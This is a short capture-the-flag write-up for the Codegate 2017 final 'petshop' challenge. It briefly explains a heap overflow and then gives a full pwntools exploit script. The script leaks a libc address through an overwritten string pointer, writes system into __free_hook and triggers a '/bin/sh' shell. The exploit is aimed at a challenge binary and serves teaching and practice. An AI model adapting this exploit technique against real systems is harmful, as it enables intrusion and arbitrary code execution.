Pwnable/CTF
Codegate 2017 final petshop
HSr00t
2018. 3. 22. 23:40
The vulnerability is a heap overflow, and the difficulty is easy.
I overwrote a string object so that it points at the GOT to get a leak, then overwrote __free_hook with system (I'm not sure why I went with __free_hook, heh). Since free is called from destructors such as ~basic_string, I used that to solve the problem.
```python
from pwn import *

# Option 4 -> 1 sets a pet's name/sound/feed. The feed field is the one that
# overflows the heap chunk into the adjacent std::string object, so the
# payload carries (pointer, length) for that string at the end.
def set_pet(name, sound, feed):
    p.sendlineafter('select:', '4')
    p.sendlineafter('set:', '1')
    p.sendlineafter(':', name)
    p.sendlineafter(':', sound)
    p.sendlineafter(':', feed)

p = process('./petshop')
p.sendlineafter(':', '1')
p.sendlineafter(':', '1')
p.sendlineafter('select:', '6')
p.sendlineafter('name?', 'AAAA')

# Point the overwritten string at the GOT entry (0x604088 in the binary) with
# length 8, then print it (option 5) to leak a libc address.
set_pet('A', 'B', b'C' * 12 + p64(0x604088) + p64(0x8))
p.sendlineafter('select:', '5')
p.recvuntil('person:')
strcpy = u64(p.recv(8))

# Offsets below are for the libc shipped with the challenge.
libc_base = strcpy - 0x16bca0
system = libc_base + 0x47dc0
free_hook = libc_base + 0x3dc8a8
malloc_hook = libc_base + 0x3dac10
print(hex(strcpy))
print(hex(libc_base))
print(hex(free_hook))

# Repoint the string at __free_hook and write system's address through
# the "name" update (option 6).
set_pet('A', 'B', b'C' * 12 + p64(free_hook) + p64(8))
p.sendlineafter('select:', '6')
p.sendlineafter('name?', p64(system))

# Repoint the string at __malloc_hook and store "/bin/sh" there; when the
# string's destructor frees that pointer, free -> system("/bin/sh").
set_pet('A', 'B', b'C' * 12 + p64(malloc_hook) + p64(8))
p.sendlineafter('select:', '6')
p.sendlineafter('name?', b'/bin/sh\x00')
p.sendlineafter('select:', '2')
p.interactive()
```